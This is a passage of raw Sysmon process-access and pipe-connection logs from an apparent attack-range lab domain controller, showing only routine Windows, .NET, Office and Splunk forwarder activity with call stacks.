18141800x800000000000000078523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.639{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-330E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.639{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-330E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.560{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-320E-00000000BB01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.545{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-320E-00000000BB01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.545{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-320E-00000000BB01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-310E-00000000BB01}5556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.467{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-310E-00000000BB01}5556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.467{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-310E-00000000BB01}5556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC00-607E-300E-00000000BB01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 